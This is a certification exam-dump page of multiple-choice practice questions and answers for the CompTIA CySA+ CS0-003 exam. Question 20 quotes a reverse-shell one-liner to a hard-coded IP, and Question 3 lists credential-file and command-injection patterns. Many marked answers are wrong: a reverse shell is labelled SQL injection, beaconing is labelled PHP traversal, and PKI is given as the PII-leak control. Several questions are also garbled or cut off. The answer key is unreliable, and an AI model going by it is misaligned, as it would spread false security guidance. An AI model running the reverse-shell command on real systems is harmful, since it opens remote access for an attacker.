DON'T WANT TO MISS A THING?

Certification Exam Passing Tips

Latest exam news and discount info

Curated and up-to-date by our experts

Yes, send me the newsletter

CompTIA CS0-003 Certification Exam Questions & Answers, CompTIA Cybersecurity Analyst (CySA+) | SPOTO

Prepare for the CompTIA CS0-003 Certification Exam with our comprehensive collection of practice tests. Our platform offers a diverse range of exam materials, including free tests, sample questions, mock exams, and more. Access exam questions and answers curated by experts in the field to enhance your exam preparation. Utilize our online exam simulator to simulate real exam scenarios and gauge your readiness. With our exam dumps, you'll gain valuable insights into the exam structure and content, ensuring confidence on exam day. Whether you're seeking to reinforce your knowledge or familiarize yourself with exam patterns, our practice tests provide the ideal resource for success in the CompTIA Cybersecurity Analyst (CySA+) certification exam.
Take other online exams

Question #1
Which of the following organizational initiatives would be MOST impacted by data severighty issues?
A. Moving to a cloud-based environment
B. Migrating to locally hosted virtual servers
C. Implementing non-repudiation controls
D. Encrypting local database queries
View answer
Correct Answer: C
Question #2
A security analyst recently joined the team and is trying to determine which scripting language is being used in a production script to determine if it is malicious. Given the following script: Which of the following scripting languages was used in the script?
A. PowerShel
B. Ruby
C. Python
D. Shell script
View answer
Correct Answer: A
Question #3
A security analyst discovers an LFI vulnerability that can be exploited to extract credentials from the underlying host. Which of the following patterns can the security analyst use to search the web server logs for evidence of exploitation of that particular vulnerability?
A. /etc/ shadow
B. curl localhost
C. ; printenv
D. cat /proc/self/
View answer
Correct Answer: A
Question #4
Which of the following is the BEST way to gather patch information on a specific server?
A. Event Viewer
B. Custom script
C. SCAP software
D. CI/CD
View answer
Correct Answer: D
Question #5
The Chief Information Security Officer is directing a new program to reduce attack surface risks and threats as part of a zero trust approach. The IT security team is required to come up with priorities for the program. Which of the following is the best priority based on common attack frameworks?
A. Reduce the administrator and privileged access accounts
B. Employ a network-based IDS
C. Conduct thorough incident response
D. Enable SSO to enterprise applications
View answer
Correct Answer: C
Question #6
An organization has the following risk mitigation policy: Risks with a probability of 95% or greater will be addressed before all others regardless of the impact. All other prioritization will be based on risk value. The organization has identified the following risks: Which of the following is the order of priority for risk mitigation from highest to lowest?
A. A, B, D, C
B. A, B, C, D
C. D, A, B, C
D. D, A, C, B
View answer
Correct Answer: C
Question #7
Given the following CVSS string- CVSS:3.0/AV:N/AC:L/PR:N/UI:N/3:U/C:K/I:K/A:H Which of the following attributes correctly describes this vulnerability?
A. A user is required to exploit this vulnerability
B. The vulnerability is network based
C. The vulnerability does not affect confidentiality
D. The complexity to exploit the vulnerability is high
View answer
Correct Answer: B
Question #8
While reviewing web server logs, a security analyst found the following line: Which of the following malicious activities was attempted?
A. Command injection
B. XML injection
C. Server-side request forgery
D. Cross-site scripting
View answer
Correct Answer: D
Question #9
While reviewing web server logs, an analyst notices several entries with the same time stamps, but all contain odd characters in the request line. Which of the following steps should be taken next?
A. Shut the network down immediately and call the next person in the chain of command
B. Determine what attack the odd characters are indicative of
C. Utilize the correct attack framework and determine what the incident response will consist of
D. Notify the local law enforcement for incident response
View answer
Correct Answer: D
Question #10
Which of the following is the first step that should be performed when establishing a disaster recovery plan?
A. Agree on the goals and objectives of the plan
B. Determine the site to be used during a disasterC Demonstrate adherence to a standard disaster recovery process
C. Identity applications to be run during a disaster
View answer
Correct Answer: A
Question #11
Which of the following is the best metric for an organization to focus on given recent investments in SIEM, SOAR, and a ticketing system?
A. Mean time to detect
B. Number of exploits by tactic
C. Alert volume
D. Quantity of intrusion attempts
View answer
Correct Answer: A
Question #12
An employee accessed a website that caused a device to become infected with invasive malware. The incident response analyst has: ? created the initial evidence log. ? disabled the wireless adapter on the device. ? interviewed the employee, who was unable to identify the website that was accessed ? reviewed the web proxy traffic logs. Which of the following should the analyst do to remediate the infected device?
A. Update the system firmware and reimage the hardware
B. Install an additional malware scanner that will send email alerts to the analyst
C. Configure the system to use a proxy server for Internet access
D. Delete the user profile and restore data from backup
View answer
Correct Answer: A
Question #13
A manufacturing company uses a third-party service provider for Tier 1 security support. One of the requirements is that the provider must only source talent from its own country due to geopolitical and national security interests. Which of the following can the manufacturing company implement to ensure the third-party service provider meets this requirement?
A. Implement a secure supply chain program with governance
B. Implement blacklisting lor IP addresses from outside the county
C. Implement strong authentication controls for at contractors
D. Implement user behavior analytics tor key staff members
View answer
Correct Answer: A
Question #14
An IT security analyst has received an email alert regarding vulnerability within the new fleet of vehicles the company recently purchased. Which of the following attack vectors is the vulnerability MOST likely targeting?
A. SCADA
B. CAN bus
C. Modbus
D. loT
View answer
Correct Answer: A
Question #15
Which of the following would help an analyst to quickly find out whether the IP address in a SIEM alert is a known-malicious IP address?
A. Join an information sharing and analysis center specific to the company's industry
B. Upload threat intelligence to the IPS in STIX/TAXII format
C. Add data enrichment for IPS in the ingestion pipleline
D. Review threat feeds after viewing the SIEM alert
View answer
Correct Answer: A
Question #16
A security analyst is trying to identify possible network addresses from different source networks belonging to the same company and region. Which of the following shell script functions could help achieve the goal?
A. function w() { a=$(ping -c 1 $1 | awk-F ”/” ’END{print $1}’) && echo “$1 | $a” }
B. function x() { b=traceroute -m 40 $1 | awk ’END{print $1}’) && echo “$1 | $b” }
C. function y() { dig $(dig -x $1 | grep PTR | tail -n 1 | awk -F ”
D. function z() { c=$(geoiplookup$1) && echo “$1 | $c” }
View answer
Correct Answer: A
Question #17
A recent zero-day vulnerability is being actively exploited, requires no user interaction or privilege escalation, and has a significant impact to confidentiality and integrity but not to availability. Which of the following CVE metrics would be most accurate for this zero-day threat?
A. CVSS: 31/AV: N/AC: L/PR: N/UI: N/S: U/C: H/1: K/A: L
B. CVSS:31/AV:K/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:L
C. CVSS:31/AV:N/AC:L/PR:N/UI:H/S:U/C:L/I:N/A:H
D. CVSS:31/AV:L/AC:L/PR:R/UI:R/S:U/C:H/I:L/A:H
View answer
Correct Answer: A
Question #18
White reviewing incident reports from the previous night, a security analyst notices the corporate websites were defaced with po mcai propaganda. Which of the following BEST Describes this type of actor?
A. Hacktivist
B. Nation-state
C. insider threat
D. Organized crime
View answer
Correct Answer: C
Question #19
An analyst notices there is an internal device sending HTTPS traffic with additional characters in the header to a known-malicious IP in another country. Which of the following describes what the analyst has noticed?
A. Beaconing
B. Cross-site scripting
C. Buffer overflow
D. PHP traversal
View answer
Correct Answer: D
Question #20
A security analyst detects an exploit attempt containing the following command: sh -i >& /dev/udp/10.1.1.1/4821 0>$l Which of the following is being attempted?
A. RCE
B. Reverse shell
C. XSS
D. SQL injection
View answer
Correct Answer: D
Question #21
A security analyst is researching ways to improve the security of a company's email system to mitigate emails that are impersonating company executives. Which of the following would be BEST for the analyst to configure to achieve this objective?
A. A TXT record on the name server for SPF
B. DNSSEC keys to secure replication
C. Domain Keys identified Man
D. A sandbox to check incoming mad
View answer
Correct Answer: B
Question #22
A security analyst needs to provide the development learn with secure connectivity from the corporate network to a three-tier cloud environment. The developers require access to servers in all three tiers in order to perform various configuration tasks. Which of the following technologies should the analyst implement to provide secure transport?
A. CASB
B. VPC
C. Federation
D. VPN
View answer
Correct Answer: C
Question #23
Which of the following best describes the key elements of a successful information security program?
A. Business impact analysis, asset and change management, and security communication plan
B. Security policy implementation, assignment of roles and responsibilities, and information asset classification
C. Disaster recovery and business continuity planning, and the definition of access control requirements and human resource policies
D. Senior management organizational structure, message distribution standards, and procedures for the operation of security management systems
View answer
Correct Answer: A
Question #24
A security analyst is trying to identify anomalies on the network routing. Which of the following functions can the analyst use on a shell script to achieve the objective most accurately?
A. function x() { info=$(geoiplookup $1) && echo "$1 | $info" }
B. function x() { info=$(ping -c 1 $1 | awk -F "/" ’END{print $5}’) && echo "$1 | $info" }
C. function x() { info=$(dig $(dig -x $1 | grep PTR | tail -n 1 | awk -F "
D. function x() { info=$(traceroute -m 40 $1 | awk ‘END{print $1}’) && echo "$1 | $info" }
View answer
Correct Answer: D
Question #25
An organization recently changed its BC and DR plans. Which of the following would best allow for the incident response team to test the changes without any impact to the business?
A. Perform a tabletop drill based on previously identified incident scenarios
B. Simulate an incident by shutting down power to the primary data center
C. Migrate active workloads from the primary data center to the secondary location
D. Compare the current plan to lessons learned from previous incidents
View answer
Correct Answer: B
Question #26
Joe, a leading sales person at an organization, has announced on social media that he is leaving his current role to start a new company that will compete with his current employer. Joe is soliciting his current employer's customers. However, Joe has not resigned or discussed this with his current supervisor yet. Which of the following would be the best action for the incident response team to recommend?
A. Isolate Joe's PC from the network
B. Reimage the PC based on standard operating procedures
C. Initiate a remote wipe of Joe's PC using mobile device management
D. Perform no action until HR or legal counsel advises on next steps
View answer
Correct Answer: B
Question #27
Which of the following tools would work best to prevent the exposure of PII outside of an organization?
A. PAM
B. IDS
C. PKI
D. DLP
View answer
Correct Answer: C
Question #28
The Chief Information Security Officer wants to eliminate and reduce shadow IT in the enterprise. Several high-risk cloud applications are used that increase the risk to the organization. Which of the following solutions will assist in reducing the risk?
A. Deploy a CASB and enable policy enforcement
B. Configure MFA with strict access
C. Deploy an API gateway
D. Enable SSO to the cloud applications
View answer
Correct Answer: A
Question #29
A company's Chief Information Officer wants to use a CASB solution to ensure policies are being met during cloud access. Due to the nature of the company's business and risk appetite, the management team elected to not store financial information in the cloud. A security analyst needs to recommend a solution to mitigate the threat of financial data leakage into the cloud. Which of the following should the analyst recommend?
A. Utilize the CASB to enforce DLP data-at-rest protection for financial information that is stored on premises
B. Do not utilize the CASB solution for this purpose, but add DLP on premises for data in motion
C. Utilize the CASB to enforce DLP data-in-motion protection for financial information moving to thecloud
D. Do not utilize the CASB solution for this purpose, but add DLP on premises for data at rest
View answer
Correct Answer: C
Question #30
A security analyst is reviewing the output of tcpdump to analyze the type of activity on a packet capture: Which of the following generated the above output?
A. A port scan
B. A TLS connection
C. A vulnerability scan
D. A ping sweep
View answer
Correct Answer: D
Question #31
A security analyst has found the following suspicious DNS traffic while analyzing a packet capture: ? DNS traffic while a tunneling session is active. ? The mean time between queries is less than one second. ? The average query length exceeds 100 characters. Which of the following attacks most likely occurred?
A. DNS exfiltration
B. DNS spoofing
C. DNS zone transfer
D. DNS poisoning
View answer
Correct Answer: D
Question #32
A cybersecurity analyst notices unusual network scanning activity coming from a country that the company does not do business with. Which of the following is the best mitigation technique?
A. Geoblock the offending source country
B. Block the IP range of the scans at the network firewall
C. Perform a historical trend analysis and look for similar scanning activity
D. Block the specific IP address of the scans at the network firewall
View answer
Correct Answer: A
Question #33
Forming a hypothesis, looking for indicators of compromise, and using the findings to proactively improve detection capabilities are examples of the value of:
A. vulnerability scanning
B. threat hunting
C. red learning
D. penetration testing
View answer
Correct Answer: B
Question #34
A new cybersecurity analyst is tasked with creating an executive briefing on possible threats to the organization. Which of the following will produce the data needed for the briefing?
A. Firewall logs
B. Indicators of compromise
C. Risk assessment
D. Access control lists
View answer
Correct Answer: B

View Answers after Submission

Please submit your email and WhatsApp to get the answers of questions.

Note: Please make sure your email ID and Whatsapp are valid so that you can get the correct exam results.

Email:
Whatsapp/phone number: